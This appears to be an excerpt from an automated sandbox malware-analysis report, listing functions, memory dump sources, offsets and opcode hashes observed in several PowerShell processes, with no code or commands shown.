Source File: 00000002.00000002.1614048624.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb4adf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d73015cfc54ec9059f400fba96f34f0a785cd2dfce1251b2663572bb274bae6
Instruction ID: e5a909cd9df8417e8b57694dcfe961e4adeab6ff1692154f02291cf6606c5ff4
Opcode Fuzzy Hash: 5d73015cfc54ec9059f400fba96f34f0a785cd2dfce1251b2663572bb274bae6
Instruction Fuzzy Hash: 0E11E0F2A1EA4A4FE7A9EF7CD4545B57AD4EF4022076800F6E45EC7192DA58AC048341

Function 00007FFB4AD233B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1613519609.00007FFB4AD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb4ad20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: 3677dc99fc77e040db7dbafae5d6af052a5f19ca1ca5e3798c101c82d2bd2896
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 6B01677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056EE58AC3665DA36E892CB46

Non-executed Functions

Function 00007FFB4AD28BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

M_^F, xrefs: 00007FFB4AD28C7A
M_^7, xrefs: 00007FFB4AD28C12
M_^4, xrefs: 00007FFB4AD28BFA
M_^J, xrefs: 00007FFB4AD28C8A

Memory Dump Source

Source File: 00000002.00000002.1613519609.00007FFB4AD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb4ad20000_powershell.jbxd

Similarity

API ID:
String ID: M_^4$M_^7$M_^F$M_^J
API String ID: 0-622050427
Opcode ID: 534fefa1cb2e8f8263d02c6fd69b21d9057d5f113bcb6884de792183f0f1dd20
Instruction ID: a4cb10b4f51f4922a82f79c0a322c5650c15861a087b183e7b62013d2829bd98
Opcode Fuzzy Hash: 534fefa1cb2e8f8263d02c6fd69b21d9057d5f113bcb6884de792183f0f1dd20
Instruction Fuzzy Hash: CB2101B7609665EED3427F7DF8049E93748CF9423478543F2E49ADB083F91864978AE0

Analysis Process: powershell.exePID: 2156, Parent PID: 6848COMMON

Executed Functions

Function 00007FFB4ADF6605 Relevance: .5, Instructions: 451COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1716611569.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb4adf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06db2a0546c5d244bbc4e8d11065d7737f6c22ad83b062efe1002e0be714ed2a
Instruction ID: ef9cac9e898289a5c179ccc715c2ebd49299c0a3e1b580f1d4bf7109e6c71665
Opcode Fuzzy Hash: 06db2a0546c5d244bbc4e8d11065d7737f6c22ad83b062efe1002e0be714ed2a
Instruction Fuzzy Hash: 19D146A2A0DBCA4FE796AF788C555B67BD5EF19210B2801FEE44CCB4D3DA189C05C351

Function 00007FFB4AD2A0E0 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1715841601.00007FFB4AD28000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD28000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb4ad28000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50dc7e7911816156f679a4e92f7947cc26ab7ce6e07093e410d3ee54e331c31c
Instruction ID: 5c23ec347b212320b7bd7519fb929be22c29e38487bdfe8fdbd2dd120d6e834a
Opcode Fuzzy Hash: 50dc7e7911816156f679a4e92f7947cc26ab7ce6e07093e410d3ee54e331c31c
Instruction Fuzzy Hash: 86218C6690E7C98FD743AF3898691D5BFB0EF13114B0941E7D888CF0A3DA195849C7A3

Function 00007FFB4AD2A9D8 Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1715841601.00007FFB4AD28000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD28000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb4ad28000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88bd645d0c9f84649f91b34c944f737cf5e94880388dc8159366bf529af946b9
Instruction ID: 32d69500dc80f388984d8c9692f717b0e85082f8b1aec08795e0dd9dd12d4662
Opcode Fuzzy Hash: 88bd645d0c9f84649f91b34c944f737cf5e94880388dc8159366bf529af946b9
Instruction Fuzzy Hash: 9C717B7260CB854FD305EF2CC8A9565BBE1EF56314B6402FED489CB1A3E91A6807C742

Function 00007FFB4ADF4073 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1716611569.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb4adf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d5fc956a8c2dfdf38686bbd9b0039dd76ad7651ac91997240c21e9176873542
Instruction ID: efea2ef1fc3d2cbc1a53c89dfd974485e09ff80d53ea94230e09302327a45aca
Opcode Fuzzy Hash: 8d5fc956a8c2dfdf38686bbd9b0039dd76ad7651ac91997240c21e9176873542
Instruction Fuzzy Hash: 4A5105A2B0DA464FEB99EE3CD55167677D6EF94220B6800FAE04EC7693DE14EC058381

Function 00007FFB4AD29770 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1715841601.00007FFB4AD28000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD28000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb4ad28000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db16c045623f78152cbb3ec22d5e20d67adda4157ce9517d01f73a7f43177024
Instruction ID: 8be735d7edd646a42acc23af223b080a4b4ec284b5bb8868fc0a07609acaa924
Opcode Fuzzy Hash: db16c045623f78152cbb3ec22d5e20d67adda4157ce9517d01f73a7f43177024
Instruction Fuzzy Hash: 0C41167191CB885FD7089F5CEC166E97BE0FB99311F00426FE44983252CA60A856CBC2

Function 00007FFB4AC0ED40 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1715189200.00007FFB4AC0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AC0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb4ac0d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 469fa7fb921a0704ec3f3c42b6b4be7fa283fb72db123c6f5943400bde2aeb5b
Instruction ID: b4d3d68da6706a2d248a6c53f0a29b9651db08cd78b58d115dad2d495546b469
Opcode Fuzzy Hash: 469fa7fb921a0704ec3f3c42b6b4be7fa283fb72db123c6f5943400bde2aeb5b
Instruction Fuzzy Hash: 2B41D07140DBC48FE796DF28DC419523FF4EB56220B1906DFD088CB5A3D629A846C7A2

Function 00007FFB4AD2A8EC Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1715841601.00007FFB4AD28000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD28000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb4ad28000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2016f94a622e86dcbc6133d31786e619b146e388bb2538fca54e6a38a636a7f
Instruction ID: 39544dea0b8a03b06503eac1763c29f6a8fc80be201c789f32d8e1623438a87c
Opcode Fuzzy Hash: b2016f94a622e86dcbc6133d31786e619b146e388bb2538fca54e6a38a636a7f
Instruction Fuzzy Hash: 7C31487190DB8C4FDB55DFAC88496E97FE0EB66320F0441AFC048C7163DA645806CB52

Function 00007FFB4ADF40BF Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1716611569.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb4adf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6543b6d96e4c048870a88bea3089b4b828e1690813bde606782466fb965f59b9
Instruction ID: f20d909dc8bbf161db5e562cdb22c02f80b2a7382760ed81f66aaf7dfffc1f69
Opcode Fuzzy Hash: 6543b6d96e4c048870a88bea3089b4b828e1690813bde606782466fb965f59b9
Instruction Fuzzy Hash: 5821C3E3B4DA475FEBA9EF2CC65117666D9EF54210B6900F9E04DC76A2CD18EC058341

Function 00007FFB4AD233B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1715841601.00007FFB4AD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb4ad20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: 3677dc99fc77e040db7dbafae5d6af052a5f19ca1ca5e3798c101c82d2bd2896
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 6B01677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056EE58AC3665DA36E892CB46

Function 00007FFB4ADF43FB Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1716611569.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb4adf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 127c2ee2761532d6e617bfd0e65a623edf785b6663279d52276b96f00815f6c7
Instruction ID: a63e165f1a7ea332d353797c2b0d22bac5037cd98aaeae7a680e1a147ec93d7f
Opcode Fuzzy Hash: 127c2ee2761532d6e617bfd0e65a623edf785b6663279d52276b96f00815f6c7
Instruction Fuzzy Hash: 53F09AB2A0C5498FD759EF2CE4518A877E4FF44320B1500F6E08ACB063CA2AEC85C750

Non-executed Functions

Function 00007FFB4AD28BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON

Download Yara Rule

Strings

M_^?, xrefs: 00007FFB4AD28C2A
M_^N, xrefs: 00007FFB4AD28C72
M_^J, xrefs: 00007FFB4AD28C62
M_^K, xrefs: 00007FFB4AD28C6A
M_^Y, xrefs: 00007FFB4AD28CBA
M_^8, xrefs: 00007FFB4AD28BF2
M_^Q, xrefs: 00007FFB4AD28C8A
M_^<, xrefs: 00007FFB4AD28C12

Memory Dump Source

Source File: 00000005.00000002.1715841601.00007FFB4AD28000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD28000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb4ad28000_powershell.jbxd

Similarity

API ID:
String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
API String ID: 0-962139525
Opcode ID: dd74cbf770ff4ad41c2ab806e90706d3460cfcfaa48027ee49cd542451ad4c17
Instruction ID: bfd3e0222f591778c3895bcec5792a70f1f528624df8554bd1b41c8d33c9fef8
Opcode Fuzzy Hash: dd74cbf770ff4ad41c2ab806e90706d3460cfcfaa48027ee49cd542451ad4c17
Instruction Fuzzy Hash: 2D21F9B3604615DAD2423A7CF8419DC7784DF5437938643F3E829DF153ED1868978AE1

Analysis Process: powershell.exePID: 4052, Parent PID: 6848COMMON

Executed Functions

Function 00007FFB4AE039D1 Relevance: 2.8, Strings: 1, Instructions: 1588COMMON

Download Yara Rule

Strings

J_H, xrefs: 00007FFB4AE03BD2

Memory Dump Source

Source File: 00000008.00000002.1860968764.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffb4ae00000_powershell.jbxd

Similarity

API ID:
String ID: J_H
API String ID: 0-326533465
Opcode ID: 7166a6e5342d34efa772929528f327333186d6345350c507bc0f530b57c35d60
Instruction ID: 5e0d57495c26d3db1565a7a9d6b8bae86e92c7d98b931b1fb829806c15abab6a
Opcode Fuzzy Hash: 7166a6e5342d34efa772929528f327333186d6345350c507bc0f530b57c35d60
Instruction Fuzzy Hash: 0EA248A294DB9A0FE356BE38C9551B43FE5FF92210B2901FBD09DD7193DD18AC068392

Function 00007FFB4AE06605 Relevance: .5, Instructions: 453COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1860968764.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffb4ae00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87f3471d61ff9ae44d839fcf92d81cbba4e564e739d1019da099f509e87806cf
Instruction ID: 8b201a501d9e162bccc32bf67900047fbcfc06033291b8e8c3c549f186ffd1fb
Opcode Fuzzy Hash: 87f3471d61ff9ae44d839fcf92d81cbba4e564e739d1019da099f509e87806cf
Instruction Fuzzy Hash: C0D137B290DB9A8FE796BF7888152B67FE5FF15310B2800FED49CE7093DA5898058351

Function 00007FFB4AD3A0D3 Relevance: .3, Instructions: 255COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1859975938.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffb4ad30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b261a56136edf30be90608b7472f5a31269abed27496590d0d6c41912a6dfe0
Instruction ID: b6165673a032f05d892519358550cce270e8822864d3efdd177b827c66c77748
Opcode Fuzzy Hash: 1b261a56136edf30be90608b7472f5a31269abed27496590d0d6c41912a6dfe0
Instruction Fuzzy Hash: D8114CA7A0EBC44FD753AF3498690A47FB0EF6325175D00EBD488CB0B3DA1A4808C792

Function 00007FFB4AD39758 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1859975938.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffb4ad30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b90356d33537fca0beb1e2566c37e2b287cbc3c70e73c0f5657ce9df95a9b9db
Instruction ID: ae7c5840194b8367a85cfec34e02fb4d5791d3e65f8f2f3c638d92a46bb7bab0
Opcode Fuzzy Hash: b90356d33537fca0beb1e2566c37e2b287cbc3c70e73c0f5657ce9df95a9b9db
Instruction Fuzzy Hash: 8D31097191CB484FDB1CAF5CA8466F97BE0FBA9311F10416FE44993292CA71A856CBC2

Function 00007FFB4AC1E700 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1859037289.00007FFB4AC1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AC1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffb4ac1d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 204b0740b3ef4c5088e3fbf9817411f458e96c272cc24c8d77d3ee89e27fbb68
Instruction ID: 0c05bee745511a96a898153a9e75ce6a409dabc7b0dbdc5ffdd9126d8315be7e
Opcode Fuzzy Hash: 204b0740b3ef4c5088e3fbf9817411f458e96c272cc24c8d77d3ee89e27fbb68
Instruction Fuzzy Hash: 4B41057040DBC49FE7569F3998459623FF4EF52320B1901DFD088CB1A3DA29A846C7A2

Function 00007FFB4AE040BF Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1860968764.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffb4ae00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38f065cee9c99319e436a5dc8536092270198dbe9c39b1bb7a0e0a5894128f86
Instruction ID: f69219b8d5894254d33f02ad5ce95c77dcb3fa0008791165599660ba88e3132c
Opcode Fuzzy Hash: 38f065cee9c99319e436a5dc8536092270198dbe9c39b1bb7a0e0a5894128f86
Instruction Fuzzy Hash: 7621E0A298DA9B4FE3AABE38875117466D6FF60310B7900FAD06DE71A3CD18EC058341

Function 00007FFB4AD3A62C Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1859975938.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffb4ad30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dae783499f105de42b1504c4ee458984f703399070b91927449fb7ada233c207
Instruction ID: 8edef576fb86ae7e29d0ce4fd15674847611b2d08ecd82c21a07e9d78076ba4d
Opcode Fuzzy Hash: dae783499f105de42b1504c4ee458984f703399070b91927449fb7ada233c207
Instruction Fuzzy Hash: 52212831A0CB4C4FDB59EF6CD8497E97FE0EB96321F0441ABD448C3162DA749416CB92

Function 00007FFB4AE043BC Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1860968764.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffb4ae00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c822a605d3b5ef1848b23f8a8007a25300a5050b7b1abbdcbf40c67c99598d05
Instruction ID: 33a24bf5a6e85261b108a1435807d011f0d792f52e39f849a2abb391683a8313
Opcode Fuzzy Hash: c822a605d3b5ef1848b23f8a8007a25300a5050b7b1abbdcbf40c67c99598d05
Instruction Fuzzy Hash: 6E1123B2D5E6994FE7A5FE78C6504B87BD5FF40220B7910F6D06EE7087D918AC008341

Function 00007FFB4AD333B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1859975938.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffb4ad30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction ID: b764d3461e64808fe044017503b5428d6c6fdd3860c4a6f5c4fe6a938b6e806c
Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction Fuzzy Hash: 9F01677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056EE58AC3655DA36E892CB45

Non-executed Functions

Function 00007FFB4AD38995 Relevance: 5.1, Strings: 4, Instructions: 149COMMON

Download Yara Rule

Strings

L_^, xrefs: 00007FFB4AD389C9
L_^, xrefs: 00007FFB4AD38A2A
L_^, xrefs: 00007FFB4AD38A6A
L_^, xrefs: 00007FFB4AD38AC2

Memory Dump Source

Source File: 00000008.00000002.1859975938.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffb4ad30000_powershell.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^$L_^
API String ID: 0-2357752022
Opcode ID: b484dd2689a7e3831dd2cb6e0d5b608a45104f29af93e0017f095cc806ab8cfa
Instruction ID: a538999ee6df5eb806567f799eb678299a8f44921303f23470cd1fa2d08b208f
Opcode Fuzzy Hash: b484dd2689a7e3831dd2cb6e0d5b608a45104f29af93e0017f095cc806ab8cfa
Instruction Fuzzy Hash: 6941C2E3A0EBD21FE3467F7889650987FA4EF52325B1D40F2C1C49B083EA19190A8362

Function 00007FFB4AD38BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

L_^4, xrefs: 00007FFB4AD38BFA
L_^J, xrefs: 00007FFB4AD38C8A
L_^7, xrefs: 00007FFB4AD38C12
L_^F, xrefs: 00007FFB4AD38C7A

Memory Dump Source

Source File: 00000008.00000002.1859975938.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffb4ad30000_powershell.jbxd

Similarity

API ID:
String ID: L_^4$L_^7$L_^F$L_^J
API String ID: 0-3225005683
Opcode ID: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
Instruction ID: 5376af36bd69426e906f4ee2b6e51ecef1bdedd22d56cf8cb0bfe6298da426d5
Opcode Fuzzy Hash: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
Instruction Fuzzy Hash: 4B2101B7608225EED2427FBDF8045ED3748CB9423434592F2DA999B003EA14649B8AF0

Analysis Process: powershell.exePID: 6408, Parent PID: 6848COMMON

Executed Functions

Function 00007FFB4ADE431D Relevance: 1.5, Strings: 1, Instructions: 224COMMON

Download Yara Rule

Strings

B, xrefs: 00007FFB4ADE4320

Memory Dump Source

Source File: 0000000A.00000002.2104104453.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffb4ade0000_powershell.jbxd

Similarity

API ID:
String ID: B
API String ID: 0-1255198513
Opcode ID: 9b4d21f13ad329f3e47634ba544f6186626176b3340aa0cd6e4e44eb523a1375
Instruction ID: a9c4bb1012544ff4759fc5d6aeb7755dc2307afed64e9272a0fba032b39fd525
Opcode Fuzzy Hash: 9b4d21f13ad329f3e47634ba544f6186626176b3340aa0cd6e4e44eb523a1375
Instruction Fuzzy Hash: 475164F2B1DE491FE7A5AE38D8156B63BE4EF95320B2800FAD44DC3183D916EC058391

Function 00007FFB4ADE6605 Relevance: .4, Instructions: 444COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2104104453.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffb4ade0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e73d473a2c2f62b4f3dcb8b99e99be2811b38f10419b5d2b187b0d70f8bf0153
Instruction ID: 09aedfe17243aaa74de1cb3fd5a421beaca5a7410811787c63077531528725df
Opcode Fuzzy Hash: e73d473a2c2f62b4f3dcb8b99e99be2811b38f10419b5d2b187b0d70f8bf0153
Instruction Fuzzy Hash: C1D134A2A0EFC96FE796BF788C555BA7BA5EF55210B2800FED44CCB0C3DA189805C351

Function 00007FFB4ADE4073 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2104104453.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffb4ade0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d3f042b3ffed2e42af18738c0ea65eaf677151a42bf48e16d1944664843af00
Instruction ID: 12a18118ce950e8b52a25fc5a0c17420df2ad95dc6d3755a7d72ad179b1f0536
Opcode Fuzzy Hash: 6d3f042b3ffed2e42af18738c0ea65eaf677151a42bf48e16d1944664843af00
Instruction Fuzzy Hash: 055135A2B0DE4A5FEB99AE3CC51167677D6EF94220B6801FAC14DC7293DD16EC058381

Function 00007FFB4AD19780 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2102497376.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffb4ad10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 858f2a9cfc40eac1ee1162bebdbe0828686cbdd6cb480d5d11be43cc9019e2df
Instruction ID: 0c27f34fb870836f4d97bc5e5d97fb317325806c65a5c3d755cd45a0c99a4a20
Opcode Fuzzy Hash: 858f2a9cfc40eac1ee1162bebdbe0828686cbdd6cb480d5d11be43cc9019e2df
Instruction Fuzzy Hash: 5331C37191CB884FDB189F5CDC066A97BE0EBA9311F00426FE449D3256DA70A856CBC2

Function 00007FFB4ABFED40 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2100829544.00007FFB4ABFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffb4abfd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21c63ac518431ffb901470d280972533e692668c0d6f60107e0c658b114bab50
Instruction ID: 8ab836d0d44cc3858a30e97990649652b306ba6ebd0a93ab21b1abff7e8d3b62
Opcode Fuzzy Hash: 21c63ac518431ffb901470d280972533e692668c0d6f60107e0c658b114bab50
Instruction Fuzzy Hash: 3A41167540EBC44FE7569F38DC419623FF4EF56220B1905DFE088CB5A3D625A846C7A2

Function 00007FFB4AD1A49C Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2102497376.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffb4ad10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73ec6aa21837e5d5b139e494fc7759a21ea8469a04f358fb843231dbbbfdebd1
Instruction ID: d72a48a4f1d3fa1eeeb5bfd29d65cf516a4b711a63c976342316b59577ad4fa6
Opcode Fuzzy Hash: 73ec6aa21837e5d5b139e494fc7759a21ea8469a04f358fb843231dbbbfdebd1
Instruction Fuzzy Hash: D121287190C74C4FDB59DF6CD84A7E97FE0EB96321F04426BD048C3156C674A40ACB91

Function 00007FFB4ADE40BF Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2104104453.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffb4ade0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 468e85d6a5575abfef4c29ea9b75d653799e940802e89268907a70dc09ce7ac2
Instruction ID: 7bbe67b62823619cac15d81effc85c7431063c233996b5b831f8f0a4b1c1f6b6
Opcode Fuzzy Hash: 468e85d6a5575abfef4c29ea9b75d653799e940802e89268907a70dc09ce7ac2
Instruction Fuzzy Hash: 1B21E3E3B4DE476FEBA9AF38C65117626D5EF54260B6900FAD04DC72A2CD19EC048341

Function 00007FFB4ADE43BC Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2104104453.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffb4ade0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 880ec1d120567a3acc87b783c9fe61b31073e4f4c062653fa7bdd1a523770a57
Instruction ID: 440e6a62ac6a1add2daf5015312ebea10840a5285f8b9ddb5bff38e4c2f1ce6b
Opcode Fuzzy Hash: 880ec1d120567a3acc87b783c9fe61b31073e4f4c062653fa7bdd1a523770a57
Instruction Fuzzy Hash: E41102F2B1EE4A5FE3A9EF38D5909B97BD4EF4432076800F6D05EC7192DA1AAC008351

Function 00007FFB4AD133B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2102497376.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffb4ad10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
